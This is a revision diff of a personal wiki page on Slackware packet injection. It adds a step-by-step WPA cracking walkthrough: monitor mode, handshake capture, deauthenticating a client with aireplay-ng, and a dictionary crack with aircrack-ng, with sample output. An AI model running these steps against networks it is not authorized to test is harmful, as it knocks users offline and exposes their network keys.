Reinstalling Sanity

User Tools

Site Tools

Trace:
slackware:packet_injection

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
slackware:packet_injection [2011/06/21 23:42] slackslackware:packet_injection [2019/11/07 17:58] (current) – external edit 127.0.0.1
Line 44: Line 44:
 make unload make unload
 </code> </code>
 +
 +====== Cracking WEP ======
  
 Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial): Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial):
Line 200: Line 202:
       Probability: 100%       Probability: 100%
 </code> </code>
 +
 +====== Cracking WPA ======
 +
 +===== 1. Put the Wireless Interface into Monitor Mode =====
 +
 +<code bash>
 +airmon-ng start wlan0 9
 +</code>
 +
 +Final number is the channel.  From now on refer to this device as mon0 (because we're using mac80211 drivers).
 +
 +===== 2. Listen for a Handshake =====
 +
 +The handshake is the only interesting and useful part of communication between AP and client.
 +
 +<code bash>
 + airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0
 +</code>
 +
 +Where:
 +  * -c 9 is the channel for the wireless network
 +  * --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
 +  * -w psk is the file name prefix for the file which will contain the IVs.
 +  * mon0 is the interface name.
 +
 +Success looks like this -- notice the "WPA handshake:..." in the top right.
 +
 +<code bash>
 +  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
 +                                                                                                               
 +  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 +                                                                                                               
 +  00:14:6C:7E:40:80   39 100       51      116   14    54  WPA2 CCMP   PSK  teddy                           
 +                                                                                                               
 +  BSSID              STATION            PWR  Lost  Packets  Probes                                             
 +                                                                                                               
 +  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35          116
 +</code>
 +
 +===== 3. (if necessary) Deauthenticate a client to capture a handshake =====
 +
 +You can just wait for a handshake, but if there's a connected client, aireplay can attempt to deauthenticate it, forcing it to re-handshake.
 +
 +<code bash>
 + aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
 +</code>
 +
 +Where:
 +  * -0 means deauthentication
 +  * 1 is the number of deauths to send (you can send multiple if you wish)
 +  * -a 00:14:6C:7E:40:80 is the MAC address of the access point
 +  * -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
 +  * ath0 is the interface name
 +
 +===== 4. Crack the pre-shared key =====
 +
 +<code bash>
 +aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
 +</code>
 +
 +Where:
 +  * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
 +  * *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.
 +
slackware/packet_injection.1308699758.txt.gz · Last modified: 2019/11/07 17:58 (external edit)